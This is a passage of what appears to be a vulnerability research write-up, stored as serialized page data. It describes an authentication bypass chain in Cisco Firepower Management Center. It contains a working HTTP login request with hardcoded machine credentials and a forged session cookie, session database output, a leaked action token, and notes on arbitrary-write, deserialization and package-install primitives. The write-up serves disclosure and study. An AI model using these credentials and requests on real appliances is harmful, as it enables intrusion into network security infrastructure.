cookie\n",[1373,7450,7451,7453,7456,7458,7460,7462,7465,7467],{"class":1375,"line":4877},[1373,7452,4727],{"class":1383},[1373,7454,7455],{"class":4640},"sid = ",[1373,7457,4644],{"class":1383},[1373,7459,4735],{"class":4640},[1373,7461,4667],{"class":1397},[1373,7463,7464],{"class":4640},"cookie(",[1373,7466,4644],{"class":1383},[1373,7468,7469],{"class":4640},"CGI::Session::NAME);\n",[1373,7471,7472],{"class":1375,"line":4915},[1373,7473,4795],{"class":4640},[1373,7475,7476,7478,7481,7484,7486,7488,7490],{"class":1375,"line":4931},[1373,7477,7340],{"class":4636},[1373,7479,7480],{"class":1379}," undef",[1373,7482,7483],{"class":4636}," 
if",[1373,7485,7370],{"class":4640},[1373,7487,7350],{"class":1379},[1373,7489,4656],{"class":1383},[1373,7491,7395],{"class":4640},[1373,7493,7494],{"class":1375,"line":4947},[1373,7495,6520],{"emptyLinePlaceholder":237},[1373,7497,7498],{"class":1375,"line":4952},[1373,7499,7500],{"class":4630},"    # Initialize sfclient\n",[1373,7502,7503,7505,7507,7509,7512,7515],{"class":1375,"line":6776},[1373,7504,7340],{"class":4636},[1373,7506,7480],{"class":1379},[1373,7508,7483],{"class":4636},[1373,7510,7511],{"class":4640}," (sfclient::sfclient_Init",[1373,7513,7514],{"class":1383},"()",[1373,7516,7517],{"class":4640}," != 0);\n",[1373,7519,7520],{"class":1375,"line":6781},[1373,7521,6520],{"emptyLinePlaceholder":237},[1373,7523,7525],{"class":1375,"line":7524},24,[1373,7526,7527],{"class":4630},"    # Cache the session and return it\n",[1373,7529,7531,7534,7536,7539,7541],{"class":1375,"line":7530},25,[1373,7532,7533],{"class":4640},"    $_SESSION = MakeSession(",[1373,7535,4644],{"class":1383},[1373,7537,7538],{"class":4640},"sid, ",[1373,7540,4644],{"class":1383},[1373,7542,7543],{"class":4640},"silent);\n",[1373,7545,7547,7549,7551,7553,7555,7557,7559,7561,7563,7565,7567],{"class":1375,"line":7546},26,[1373,7548,4695],{"class":4636},[1373,7550,4641],{"class":4640},[1373,7552,4700],{"class":1379},[1373,7554,1384],{"class":4640},[1373,7556,4644],{"class":1383},[1373,7558,4707],{"class":4640},[1373,7560,4710],{"class":1379},[1373,7562,4713],{"class":1387},[1373,7564,4716],{"class":1391},[1373,7566,1388],{"class":1387},[1373,7568,4721],{"class":4640},[1373,7570,7572,7574,7577,7579,7581,7583,7586,7588,7591,7593],{"class":1375,"line":7571},27,[1373,7573,4727],{"class":1383},[1373,7575,7576],{"class":4640},"CURRENT_REQ_URL = 
",[1373,7578,4644],{"class":1383},[1373,7580,4735],{"class":4640},[1373,7582,4667],{"class":1397},[1373,7584,7585],{"class":4640},"url",[1373,7587,4667],{"class":1397},[1373,7589,7590],{"class":4640},"path",[1373,7592,4667],{"class":1397},[1373,7594,7595],{"class":4640},"to_string;\n",[1373,7597,7599,7601,7604,7606,7608,7610],{"class":1375,"line":7598},28,[1373,7600,4727],{"class":1383},[1373,7602,7603],{"class":4640},"CURRENT_REQ_METHOD = ",[1373,7605,4644],{"class":1383},[1373,7607,4735],{"class":4640},[1373,7609,4667],{"class":1397},[1373,7611,7612],{"class":4640},"method;\n",[1373,7614,7616,7619,7621,7623,7625,7628,7630],{"class":1375,"line":7615},29,[1373,7617,7618],{"class":4640},"        setCurrentReqParams(",[1373,7620,4644],{"class":1383},[1373,7622,4735],{"class":4640},[1373,7624,4667],{"class":1397},[1373,7626,7627],{"class":4640},"params",[1373,7629,4667],{"class":1397},[1373,7631,7632],{"class":4640},"to_hash);\n",[1373,7634,7636],{"class":1375,"line":7635},30,[1373,7637,4795],{"class":4640},[1373,7639,7641,7644],{"class":1375,"line":7640},31,[1373,7642,7643],{"class":4636},"    else",[1373,7645,4765],{"class":4640},[1373,7647,7649,7651,7653,7655,7657,7659,7662,7665,7667],{"class":1375,"line":7648},32,[1373,7650,4727],{"class":1383},[1373,7652,7576],{"class":4640},[1373,7654,4644],{"class":1383},[1373,7656,4735],{"class":4640},[1373,7658,4667],{"class":1397},[1373,7660,7661],{"class":4640},"url( -",[1373,7663,7664],{"class":4982},"absolute",[1373,7666,4986],{"class":1397},[1373,7668,7669],{"class":4640}," 
1);\n",[1373,7671,7673,7675,7677,7679,7681,7683],{"class":1375,"line":7672},33,[1373,7674,4727],{"class":1383},[1373,7676,7603],{"class":4640},[1373,7678,4644],{"class":1383},[1373,7680,4735],{"class":4640},[1373,7682,4667],{"class":1397},[1373,7684,7685],{"class":4640},"request_method;\n",[1373,7687,7689,7691,7694,7696,7698,7700,7703,7705],{"class":1375,"line":7688},34,[1373,7690,7618],{"class":4640},[1373,7692,7693],{"class":1379},"scalar",[1373,7695,4656],{"class":1383},[1373,7697,4735],{"class":4640},[1373,7699,4667],{"class":1397},[1373,7701,7702],{"class":4640},"Vars",[1373,7704,7514],{"class":1383},[1373,7706,4680],{"class":4640},[1373,7708,7710],{"class":1375,"line":7709},35,[1373,7711,4795],{"class":4640},[1373,7713,7715,7717],{"class":1375,"line":7714},36,[1373,7716,7340],{"class":4636},[1373,7718,7719],{"class":4640}," $_SESSION;\n",[1373,7721,7723],{"class":1375,"line":7722},37,[1373,7724,1855],{"class":4640},[18,7726,7727,7728,7730,7731,7734],{},"The biggest issue was very much a chicken and egg problem: We needed credentials to be able to upgrade a session. Then while staring at the authentication code for the hundredth time, it occurred to me: The current session checks that are applied to the ",[886,7729,4442],{}," session have the variables necessary for UI authentication. 
Attempting to use the hardcoded ",[886,7732,7733],{},"csm_processes:csmdaemon"," credentials to log in, unfortunately, causes the session to immediately expire (as is stated in the session information), and the boot session is entirely removed, locking us out of the attack path.",[18,7736,7737,7738,7740,7741,7744,7745,7747],{},"But, there's no reason that the ",[886,7739,4442],{}," session ID couldn't be upgraded by a ",[1131,7742,7743],{},"different"," machine user, and because the values are set to be able to pass UI authentication, all we had to do was take one of the hardcoded credentials that was not the ",[886,7746,4442],{}," user and authentication would be happy even if it's a non-UI machine user.",[18,7749,7750,7751,7753,7754,7756,7757,7760,7761,7763],{},"Sure enough, we could authenticate with ",[886,7752,4472],{}," credentials with the ",[886,7755,6264],{}," session set, after which the ",[886,7758,7759],{},"MakeSession"," function is called as the ",[886,7762,5061],{}," user, the checks validate the machine user as a UI user, and the session values are updated.",[1354,7765,7767],{"className":6275,"code":7766,"language":6277,"meta":219,"style":219},"POST \u002Flogin.cgi?logon=Continue HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes;\nContent-Length: 43\nAccept-Language: en-US,en;q=0.9\nOrigin: https:\u002F\u002F10.0.0.226\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\nConnection: 
keep-alive\n\nusername=report&password=snortrules&target=\n",[886,7768,7769,7782,7790,7799,7808,7816,7826,7834,7842,7851,7859,7863],{"__ignoreMap":219},[1373,7770,7771,7773,7776,7778,7780],{"class":1375,"line":1376},[1373,7772,6946],{"class":4636},[1373,7774,7775],{"class":4640}," \u002Flogin.cgi?logon=Continue ",[1373,7777,6290],{"class":5387},[1373,7779,2180],{"class":4640},[1373,7781,6295],{"class":5467},[1373,7783,7784,7786,7788],{"class":1375,"line":220},[1373,7785,6301],{"class":6300},[1373,7787,4606],{"class":5387},[1373,7789,6306],{"class":1391},[1373,7791,7792,7794,7796],{"class":1375,"line":1266},[1373,7793,6565],{"class":6300},[1373,7795,4606],{"class":5387},[1373,7797,7798],{"class":1391}," CGISESSID=csm_processes;\n",[1373,7800,7801,7803,7805],{"class":1375,"line":1852},[1373,7802,6411],{"class":6300},[1373,7804,4606],{"class":5387},[1373,7806,7807],{"class":1391}," 43\n",[1373,7809,7810,7812,7814],{"class":1375,"line":4692},[1373,7811,6986],{"class":6300},[1373,7813,4606],{"class":5387},[1373,7815,6991],{"class":1391},[1373,7817,7818,7821,7823],{"class":1375,"line":4724},[1373,7819,7820],{"class":6300},"Origin",[1373,7822,4606],{"class":5387},[1373,7824,7825],{"class":1391}," https:\u002F\u002F10.0.0.226\n",[1373,7827,7828,7830,7832],{"class":1375,"line":4756},[1373,7829,6391],{"class":6300},[1373,7831,4606],{"class":5387},[1373,7833,7185],{"class":1391},[1373,7835,7836,7838,7840],{"class":1375,"line":4768},[1373,7837,6311],{"class":6300},[1373,7839,4606],{"class":5387},[1373,7841,6316],{"class":1391},[1373,7843,7844,7846,7848],{"class":1375,"line":4792},[1373,7845,7013],{"class":6300},[1373,7847,4606],{"class":5387},[1373,7849,7850],{"class":1391}," 
text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\n",[1373,7852,7853,7855,7857],{"class":1375,"line":4798},[1373,7854,6331],{"class":6300},[1373,7856,4606],{"class":5387},[1373,7858,6336],{"class":1391},[1373,7860,7861],{"class":1375,"line":4806},[1373,7862,6520],{"emptyLinePlaceholder":237},[1373,7864,7865],{"class":1375,"line":4817},[1373,7866,7867],{"class":4640},"username=report&password=snortrules&target=\n",[18,7869,7870,7871,7873,7874,7877,7878,7880,7881,4606],{},"And the session values in the database are upgraded, the server responds with a successful authentication that redirects to the UI ",[886,7872,2180],{}," and a ",[886,7875,7876],{},"Set-Cookie"," set to the already established (but now upgraded) ",[886,7879,6264],{},". The session now has more session values set, including the necessary ",[886,7882,4468],{},[1354,7884,7886],{"className":5372,"code":7885,"language":5374,"meta":219,"style":219},"MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions WHERE id='csm_processes';\n| $D = {'useruuid' => '616931da-e3df-11dc-8002-930b8c1d4d5e','user_access_type' => 0,'_SESSION_ID' => 'csm_processes','last_csm_refresh' => 1773962941,'current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','VMS_SESSION_ID' => 'csm_processes','_SESSION_ATIME' => 1773962943,'original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','username' => 'report','_SESSION_CTIME' => 1773962523,'_SESSION_EXPIRE_LIST' => {'session_expire_check' => 3600},'_SESSION_REMOTE_ADDR' => '','usertype' => 1,'_SESSION_ETIME' => 3900,'session_expire_check' => 1,'last_login' => {'remote_host_ip' => '10.0.1.10','last_login_time' => 1773951618},'sf_action_id' => 'fe8b71b0344419ae464328a578a12902','active' => 0};;$D 
|\n",[886,7887,7888,7922],{"__ignoreMap":219},[1373,7889,7890,7892,7894,7896,7898,7900,7902,7904,7906,7909,7912,7914,7916,7918,7920],{"class":1375,"line":1376},[1373,7891,5381],{"class":4640},[1373,7893,5384],{"class":1397},[1373,7895,5388],{"class":5387},[1373,7897,5391],{"class":4640},[1373,7899,5394],{"class":5387},[1373,7901,5397],{"class":2326},[1373,7903,59],{"class":4640},[1373,7905,5402],{"class":2326},[1373,7907,7908],{"class":5387}," WHERE",[1373,7910,7911],{"class":4640}," id",[1373,7913,5417],{"class":1397},[1373,7915,1388],{"class":1387},[1373,7917,4442],{"class":1391},[1373,7919,1388],{"class":1387},[1373,7921,4912],{"class":4640},[1373,7923,7924,7926,7928,7930,7932,7934,7936,7938,7940,7943,7945,7947,7949,7951,7953,7955,7957,7959,7961,7963,7965,7967,7969,7971,7973,7975,7977,7979,7981,7983,7986,7988,7990,7992,7994,7996,7998,8000,8002,8004,8006,8008,8010,8012,8014,8016,8018,8020,8022,8024,8026,8028,8031,8033,8035,8037,8039,8041,8043,8045,8047,8049,8051,8053,8055,8057,8059,8061,8063,8065,8067,8069,8071,8073,8075,8077,8079,8081,8083,8085,8087,8089,8091,8093,8095,8097,8099,8101,8103,8105,8107,8109,8111,8113,8115,8117,8119,8121,8123,8125,8127,8129,8131,8133,8135,8137,8139,8141,8143,8145,8147,8149,8151,8153,8155,8157,8159,8161,8163,8165,8167,8169,8171,8173,8175,8177,8179,8181,8184,8186,8188,8190,8192,8194,8196,8199,8201,8203,8205,8207,8209,8211,8213],{"class":1375,"line":220},[1373,7925,5414],{"class":4640},[1373,7927,5417],{"class":1397},[1373,7929,5420],{"class":4640},[1373,7931,1388],{"class":1387},[1373,7933,5475],{"class":1391},[1373,7935,1388],{"class":1387},[1373,7937,4986],{"class":1397},[1373,7939,4713],{"class":1387},[1373,7941,7942],{"class":1391},"616931da-e3df-11dc-8002-930b8c1d4d5e",[1373,7944,1388],{"class":1387},[1373,7946,5437],{"class":4640},[1373,7948,1388],{"class":1387},[1373,7950,5821],{"class":1391},[1373,7952,1388],{"class":1387},[1373,7954,4986],{"class":1397},[1373,7956,5557],{"class":5467},[1373,7958,5437],{"class":4640},[1373,7960,
1388],{"class":1387},[1373,7962,5533],{"class":1391},[1373,7964,1388],{"class":1387},[1373,7966,4986],{"class":1397},[1373,7968,4713],{"class":1387},[1373,7970,4442],{"class":1391},[1373,7972,1388],{"class":1387},[1373,7974,5437],{"class":4640},[1373,7976,1388],{"class":1387},[1373,7978,5709],{"class":1391},[1373,7980,1388],{"class":1387},[1373,7982,4986],{"class":1397},[1373,7984,7985],{"class":5467}," 1773962941",[1373,7987,5437],{"class":4640},[1373,7989,1388],{"class":1387},[1373,7991,5607],{"class":1391},[1373,7993,1388],{"class":1387},[1373,7995,4986],{"class":1397},[1373,7997,4713],{"class":1387},[1373,7999,5451],{"class":1391},[1373,8001,1388],{"class":1387},[1373,8003,5437],{"class":4640},[1373,8005,1388],{"class":1387},[1373,8007,5590],{"class":1391},[1373,8009,1388],{"class":1387},[1373,8011,4986],{"class":1397},[1373,8013,4713],{"class":1387},[1373,8015,4442],{"class":1391},[1373,8017,1388],{"class":1387},[1373,8019,5437],{"class":4640},[1373,8021,1388],{"class":1387},[1373,8023,5520],{"class":1391},[1373,8025,1388],{"class":1387},[1373,8027,4986],{"class":1397},[1373,8029,8030],{"class":5467}," 
1773962943",[1373,8032,5437],{"class":4640},[1373,8034,1388],{"class":1387},[1373,8036,5442],{"class":1391},[1373,8038,1388],{"class":1387},[1373,8040,4986],{"class":1397},[1373,8042,4713],{"class":1387},[1373,8044,5451],{"class":1391},[1373,8046,1388],{"class":1387},[1373,8048,5437],{"class":4640},[1373,8050,1388],{"class":1387},[1373,8052,4870],{"class":1391},[1373,8054,1388],{"class":1387},[1373,8056,4986],{"class":1397},[1373,8058,4713],{"class":1387},[1373,8060,5061],{"class":1391},[1373,8062,1388],{"class":1387},[1373,8064,5437],{"class":4640},[1373,8066,1388],{"class":1387},[1373,8068,5506],{"class":1391},[1373,8070,1388],{"class":1387},[1373,8072,4986],{"class":1397},[1373,8074,5513],{"class":5467},[1373,8076,5437],{"class":4640},[1373,8078,1388],{"class":1387},[1373,8080,5578],{"class":1391},[1373,8082,1388],{"class":1387},[1373,8084,4986],{"class":1397},[1373,8086,5420],{"class":4640},[1373,8088,1388],{"class":1387},[1373,8090,5460],{"class":1391},[1373,8092,1388],{"class":1387},[1373,8094,4986],{"class":1397},[1373,8096,5784],{"class":5467},[1373,8098,5787],{"class":4640},[1373,8100,1388],{"class":1387},[1373,8102,5564],{"class":1391},[1373,8104,1388],{"class":1387},[1373,8106,4986],{"class":1397},[1373,8108,5571],{"class":1387},[1373,8110,5437],{"class":4640},[1373,8112,1388],{"class":1387},[1373,8114,4675],{"class":1391},[1373,8116,1388],{"class":1387},[1373,8118,4986],{"class":1397},[1373,8120,5468],{"class":5467},[1373,8122,5437],{"class":4640},[1373,8124,1388],{"class":1387},[1373,8126,6026],{"class":1391},[1373,8128,1388],{"class":1387},[1373,8130,4986],{"class":1397},[1373,8132,6033],{"class":5467},[1373,8134,5437],{"class":4640},[1373,8136,1388],{"class":1387},[1373,8138,5460],{"class":1391},[1373,8140,1388],{"class":1387},[1373,8142,4986],{"class":1397},[1373,8144,5468],{"class":5467},[1373,8146,5437],{"class":4640},[1373,8148,1388],{"class":1387},[1373,8150,5839],{"class":1391},[1373,8152,1388],{"class":1387},[1373,8154,4986],{"class":1397},[137
3,8156,5420],{"class":4640},[1373,8158,1388],{"class":1387},[1373,8160,5864],{"class":1391},[1373,8162,1388],{"class":1387},[1373,8164,4986],{"class":1397},[1373,8166,4713],{"class":1387},[1373,8168,5873],{"class":1391},[1373,8170,1388],{"class":1387},[1373,8172,5437],{"class":4640},[1373,8174,1388],{"class":1387},[1373,8176,5850],{"class":1391},[1373,8178,1388],{"class":1387},[1373,8180,4986],{"class":1397},[1373,8182,8183],{"class":5467}," 1773951618",[1373,8185,5787],{"class":4640},[1373,8187,1388],{"class":1387},[1373,8189,4468],{"class":1391},[1373,8191,1388],{"class":1387},[1373,8193,4986],{"class":1397},[1373,8195,4713],{"class":1387},[1373,8197,8198],{"class":1391},"fe8b71b0344419ae464328a578a12902",[1373,8200,1388],{"class":1387},[1373,8202,5437],{"class":4640},[1373,8204,1388],{"class":1387},[1373,8206,5550],{"class":1391},[1373,8208,1388],{"class":1387},[1373,8210,4986],{"class":1397},[1373,8212,5557],{"class":5467},[1373,8214,5620],{"class":4640},[18,8216,8217,8218,8221,8222,8225],{},"Another redirect to ",[886,8219,8220],{},"\u002Fui\u002Fuser\u002Fgeneral"," can be followed, and then the FMC \"DDD\" logic renders a UI template containing a call to the template ",[886,8223,8224],{},"SF::Auth::getSFActionID()"," that renders that session value on the page:",[1354,8227,8231],{"className":8228,"code":8229,"language":8230,"meta":219,"style":219},"language-html shiki shiki-themes material-theme-lighter github-light github-dark monokai","...snip...\n  \u003C!-- Global variables and functions -->\n    \u003Cscript type=\"text\u002Fjavascript\">\n      var sf_action_id = \"fe8b71b0344419ae464328a578a12902\";\n      var __prefetch = 
{\"capabilities\":{\"hideMenuForOnbox\":0,\"isLamplighterEnabled\":0,\"isOnboxManaged\":0,\"showDeployDialog\":0,\"isStandbyDC\":\"0\",\"isExternalStorageEnabled\":0,\"isWorkflowEnabled\":1,\"isSyslogAllLogsToFmc\":1,\"activityId\":0,\"isCDODeployment\":0,\"isNATExemptEnabled\":1,\"isUM\":1,\"isChangeMgmtWorkflowEnabled\":0,\"exposeDNSReputationEnforcement\":1},\"static\":{\"locale\":\"en_US\",\"SF::MultiTenancy::isDomainObjInfoVisible\":{\"isDomainInfoVisible\":0}}};\n      \u002F\u002F Backdraft integration\n            var BackdraftSyncIntegration = (function() {\n        var currentHelpTopic = undefined;\n        var navMap = {};\n...snip...\n","html",[886,8232,8233,8237,8242,8265,8283,8541,8546,8565,8581,8593],{"__ignoreMap":219},[1373,8234,8235],{"class":1375,"line":1376},[1373,8236,6784],{"class":4640},[1373,8238,8239],{"class":1375,"line":220},[1373,8240,8241],{"class":4630},"  \u003C!-- Global variables and functions -->\n",[1373,8243,8244,8247,8250,8254,8256,8258,8261,8263],{"class":1375,"line":1266},[1373,8245,8246],{"class":1383},"    \u003C",[1373,8248,8249],{"class":6300},"script",[1373,8251,8253],{"class":8252},"s_lYk"," type",[1373,8255,5417],{"class":1383},[1373,8257,183],{"class":1387},[1373,8259,8260],{"class":1391},"text\u002Fjavascript",[1373,8262,183],{"class":1387},[1373,8264,6765],{"class":1383},[1373,8266,8267,8270,8273,8275,8277,8279,8281],{"class":1375,"line":1852},[1373,8268,8269],{"class":7293},"      var",[1373,8271,8272],{"class":4640}," sf_action_id 
",[1373,8274,5417],{"class":1397},[1373,8276,4883],{"class":1387},[1373,8278,8198],{"class":1391},[1373,8280,183],{"class":1387},[1373,8282,4912],{"class":1383},[1373,8284,8285,8287,8290,8292,8294,8296,8300,8302,8305,8307,8310,8312,8314,8316,8318,8320,8323,8325,8327,8329,8331,8333,8336,8338,8340,8342,8344,8346,8349,8351,8353,8355,8357,8359,8362,8364,8366,8368,8370,8372,8374,8376,8379,8381,8383,8385,8387,8389,8392,8394,8396,8398,8400,8402,8405,8407,8409,8411,8413,8415,8418,8420,8422,8424,8426,8428,8431,8433,8435,8437,8439,8441,8444,8446,8448,8450,8452,8454,8457,8459,8461,8463,8465,8467,8470,8472,8474,8476,8478,8480,8483,8485,8487,8489,8491,8493,8496,8498,8500,8502,8505,8507,8509,8511,8514,8516,8518,8520,8523,8525,8527,8529,8532,8534,8536,8538],{"class":1375,"line":4692},[1373,8286,8269],{"class":7293},[1373,8288,8289],{"class":4640}," __prefetch ",[1373,8291,5417],{"class":1397},[1373,8293,5420],{"class":1383},[1373,8295,183],{"class":1387},[1373,8297,8299],{"class":8298},"sJhdN","capabilities",[1373,8301,183],{"class":1387},[1373,8303,8304],{"class":1383},":{",[1373,8306,183],{"class":1387},[1373,8308,8309],{"class":8298},"hideMenuForOnbox",[1373,8311,183],{"class":1387},[1373,8313,4606],{"class":1383},[1373,8315,445],{"class":5467},[1373,8317,5437],{"class":1383},[1373,8319,183],{"class":1387},[1373,8321,8322],{"class":8298},"isLamplighterEnabled",[1373,8324,183],{"class":1387},[1373,8326,4606],{"class":1383},[1373,8328,445],{"class":5467},[1373,8330,5437],{"class":1383},[1373,8332,183],{"class":1387},[1373,8334,8335],{"class":8298},"isOnboxManaged",[1373,8337,183],{"class":1387},[1373,8339,4606],{"class":1383},[1373,8341,445],{"class":5467},[1373,8343,5437],{"class":1383},[1373,8345,183],{"class":1387},[1373,8347,8348],{"class":8298},"showDeployDialog",[1373,8350,183],{"class":1387},[1373,8352,4606],{"class":1383},[1373,8354,445],{"class":5467},[1373,8356,5437],{"class":1383},[1373,8358,183],{"class":1387},[1373,8360,8361],{"class":8298},"isStandbyDC",[1373,8363,1
83],{"class":1387},[1373,8365,4606],{"class":1383},[1373,8367,183],{"class":1387},[1373,8369,445],{"class":1391},[1373,8371,183],{"class":1387},[1373,8373,5437],{"class":1383},[1373,8375,183],{"class":1387},[1373,8377,8378],{"class":8298},"isExternalStorageEnabled",[1373,8380,183],{"class":1387},[1373,8382,4606],{"class":1383},[1373,8384,445],{"class":5467},[1373,8386,5437],{"class":1383},[1373,8388,183],{"class":1387},[1373,8390,8391],{"class":8298},"isWorkflowEnabled",[1373,8393,183],{"class":1387},[1373,8395,4606],{"class":1383},[1373,8397,467],{"class":5467},[1373,8399,5437],{"class":1383},[1373,8401,183],{"class":1387},[1373,8403,8404],{"class":8298},"isSyslogAllLogsToFmc",[1373,8406,183],{"class":1387},[1373,8408,4606],{"class":1383},[1373,8410,467],{"class":5467},[1373,8412,5437],{"class":1383},[1373,8414,183],{"class":1387},[1373,8416,8417],{"class":8298},"activityId",[1373,8419,183],{"class":1387},[1373,8421,4606],{"class":1383},[1373,8423,445],{"class":5467},[1373,8425,5437],{"class":1383},[1373,8427,183],{"class":1387},[1373,8429,8430],{"class":8298},"isCDODeployment",[1373,8432,183],{"class":1387},[1373,8434,4606],{"class":1383},[1373,8436,445],{"class":5467},[1373,8438,5437],{"class":1383},[1373,8440,183],{"class":1387},[1373,8442,8443],{"class":8298},"isNATExemptEnabled",[1373,8445,183],{"class":1387},[1373,8447,4606],{"class":1383},[1373,8449,467],{"class":5467},[1373,8451,5437],{"class":1383},[1373,8453,183],{"class":1387},[1373,8455,8456],{"class":8298},"isUM",[1373,8458,183],{"class":1387},[1373,8460,4606],{"class":1383},[1373,8462,467],{"class":5467},[1373,8464,5437],{"class":1383},[1373,8466,183],{"class":1387},[1373,8468,8469],{"class":8298},"isChangeMgmtWorkflowEnabled",[1373,8471,183],{"class":1387},[1373,8473,4606],{"class":1383},[1373,8475,445],{"class":5467},[1373,8477,5437],{"class":1383},[1373,8479,183],{"class":1387},[1373,8481,8482],{"class":8298},"exposeDNSReputationEnforcement",[1373,8484,183],{"class":1387},[1373,8486,4606],{"class":
1383},[1373,8488,467],{"class":5467},[1373,8490,5787],{"class":1383},[1373,8492,183],{"class":1387},[1373,8494,8495],{"class":8298},"static",[1373,8497,183],{"class":1387},[1373,8499,8304],{"class":1383},[1373,8501,183],{"class":1387},[1373,8503,8504],{"class":8298},"locale",[1373,8506,183],{"class":1387},[1373,8508,4606],{"class":1383},[1373,8510,183],{"class":1387},[1373,8512,8513],{"class":1391},"en_US",[1373,8515,183],{"class":1387},[1373,8517,5437],{"class":1383},[1373,8519,183],{"class":1387},[1373,8521,8522],{"class":8298},"SF::MultiTenancy::isDomainObjInfoVisible",[1373,8524,183],{"class":1387},[1373,8526,8304],{"class":1383},[1373,8528,183],{"class":1387},[1373,8530,8531],{"class":8298},"isDomainInfoVisible",[1373,8533,183],{"class":1387},[1373,8535,4606],{"class":1383},[1373,8537,445],{"class":5467},[1373,8539,8540],{"class":1383},"}}};\n",[1373,8542,8543],{"class":1375,"line":4724},[1373,8544,8545],{"class":4630},"      \u002F\u002F Backdraft integration\n",[1373,8547,8548,8551,8554,8556,8558,8561,8563],{"class":1375,"line":4756},[1373,8549,8550],{"class":7293},"            var",[1373,8552,8553],{"class":4640}," BackdraftSyncIntegration ",[1373,8555,5417],{"class":1397},[1373,8557,4641],{"class":4640},[1373,8559,8560],{"class":7293},"function",[1373,8562,7514],{"class":1383},[1373,8564,4765],{"class":1383},[1373,8566,8567,8570,8573,8576,8579],{"class":1375,"line":4768},[1373,8568,8569],{"class":7293},"        var",[1373,8571,8572],{"class":4640}," currentHelpTopic",[1373,8574,8575],{"class":1397}," =",[1373,8577,8578],{"class":7054}," undefined",[1373,8580,4912],{"class":1383},[1373,8582,8583,8585,8588,8590],{"class":1375,"line":4792},[1373,8584,8569],{"class":7293},[1373,8586,8587],{"class":4640}," navMap",[1373,8589,8575],{"class":1397},[1373,8591,8592],{"class":1383}," 
{};\n",[1373,8594,8595,8598,8601],{"class":1375,"line":4798},[1373,8596,8597],{"class":1397},"...",[1373,8599,8600],{"class":4640},"snip",[1373,8602,8603],{"class":1397},"...\n",[18,8605,8606,8607,8609,8610,982,8612,8614,8615,59],{},"Now that a ",[886,8608,4468],{}," is accessible, we can make calls to the previous ",[886,8611,4491],{},[886,8613,6921],{}," endpoints with the retrieved ",[886,8616,4468],{},[61,8618,8620],{"id":8619},"a-variety-of-scripts-and-commands","A Variety of Scripts and Commands",[18,8622,8623],{},"Now that we can finally reach the CGI scripts and call them, the team crawled through these functions looking for primitives to use. We identified three useful calls:",[1789,8625,8626,8643,8679],{},[25,8627,8628,8629,8631,8632,8635,8636,8638,8639,8642],{},"An arbitrary write via ",[886,8630,6921],{}," using the ",[886,8633,8634],{},"validateLicense"," call that will take arbitrary data and write it to ",[886,8637,4484],{},". Binary data can be written to that by providing JSON Unicode-escaped values, such as ",[886,8640,8641],{},"\\u000a"," for newlines.",[25,8644,8645,8646,8631,8648,8651,8652,8655,8656,8659,8660,8662,8663,8666,8667,8670,8671,8674,8675,8678],{},"An arbitrary Perl Storable deserialization via ",[886,8647,6921],{},[886,8649,8650],{},"batchResult"," function call that allows a path traversal to ",[886,8653,8654],{},"..\u002Flicense.tmp",", and then will call ",[886,8657,8658],{},"\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FSajaxIntf.pm"," and the ",[886,8661,8650],{}," function that contains another call to ",[886,8664,8665],{},"SF::Util::DeSerialize"," that finally calls ",[886,8668,8669],{},"Storable::retrieve"," (with the unsafe ",[886,8672,8673],{},"local $Storable::Eval = $Storable::Eval = 1;"," setting). 
It's likely that this is exploitable to directly achieve RCE, but no usable ",[886,8676,8677],{},"STORABLE_thaw"," gadgets were found during testing.",[25,8680,8681,8682,8684,8685,8687,8688,8691],{},"An upgrade package installer function call to ",[886,8683,4495],{}," via the ",[886,8686,4491],{}," code and a set of options pointing to the ",[886,8689,8690],{},"license.tmp"," file that validates a large set of parameters and options, but can be used to run \"installable\" package types provided by Cisco.",[18,8693,8694,8695,8698,8699,8702],{},"The update types can be checked in ",[886,8696,8697],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUpdate.pm"," with the ",[886,8700,8701],{},"GetUpdateFileType"," function, which checks the first 1024 bytes and assigns a type to the \"install\" file:",[22,8704,8705,8711,8717,8723,8729,8739,8748,8757,8763],{},[25,8706,8707,8710],{},[886,8708,8709],{},"EMPTY"," - empty",[25,8712,8713,8716],{},[886,8714,8715],{},"GPG"," - GPG-signed install package",[25,8718,8719,8722],{},[886,8720,8721],{},"RPM"," - an RPM package",[25,8724,8725,8728],{},[886,8726,8727],{},"TARBALL_XZ"," - an XZ-compressed tarball file",[25,8730,8731,8734,8735,8738],{},[886,8732,8733],{},"BUNDLE"," - a custom Cisco install format that contains a ",[886,8736,8737],{},"bundle.tar"," file",[25,8740,8741,8744,8745],{},[886,8742,8743],{},"SCRIPT"," - a shell script that contains ",[886,8746,8747],{},"#!\u002Fbin\u002Fsh",[25,8749,8750,8753,8754],{},[886,8751,8752],{},"MAKESELF"," - a shell script that also contains the hardcoded string ",[886,8755,8756],{},"# This script was generated using Makeself",[25,8758,8759,8762],{},[886,8760,8761],{},"STUB"," - a split stub JSON file",[25,8764,8765,8768],{},[886,8766,8767],{},"UNKNOWN"," - anything else",[18,8770,2245,8771,8774,8775,8778,8779,8781,8782,8784,8785,8787,8788,8791,8792,8795,8796,8799,8800,8803,8804,8807,8808,8811,8812,8815,8816,8818,8819,8822,8823,8826,8827,8829],{},[886,8772,8773],{},"upgradeReadinessCall"," will 
